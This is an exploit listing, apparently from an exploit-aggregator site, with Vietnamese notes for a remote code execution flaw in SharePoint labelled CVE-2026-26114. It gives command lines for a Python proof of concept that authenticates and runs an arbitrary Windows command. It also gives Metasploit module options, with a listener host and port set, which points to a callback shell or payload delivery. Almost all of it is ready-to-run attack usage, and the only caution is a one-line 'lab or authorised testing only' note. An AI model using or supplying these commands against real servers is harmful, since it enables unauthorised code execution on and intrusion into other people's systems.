## https://sploitus.com/exploit?id=816BFD0D-57FA-5C9C-B54C-3F0F88BD2C84
# CVE-2026-26114
Chi su dung trong lab hoac he thong duoc phep kiem thu.
## Python PoC
```bash
pip install requests requests-ntlm
python poc/cve_2026_26114_rce.py ^
--target http://sharepoint.local ^
--username sp_user1 ^
--password "Password123!" ^
--domain SP19 ^
--cmd "cmd /c whoami > C:\Windows\Temp\cve_2026_26114.txt"
```
Co the dung `--proxy http://127.0.0.1:8080`, `--insecure`, hoac thay `--cmd` bang `--marker-file C:\Windows\Temp\marker.txt`.
## Metasploit module
Module nam tai:
```text
modules/exploits/windows/http/sharepoint_cve_2026_26114.rb
```
Vi du options:
```text
use exploit/windows/http/sharepoint_cve_2026_26114
set RHOSTS sharepoint.local
set RPORT 80
set SSL false
set TARGETURI /
set USERNAME sp_user1
set PASSWORD Password123!
set DOMAIN SP19
set SRVHOST 192.168.56.1
set SRVPORT 8080
set LHOST 192.168.56.1
set LPORT 4444
check
run
```
Neu khong dung auto-discovery, set them `TAXONOMY_STORE_ID`, `TAXONOMY_GROUP_ID`, `SITE_ID`, `WEB_ID`, `JOB_CREATOR_ID`.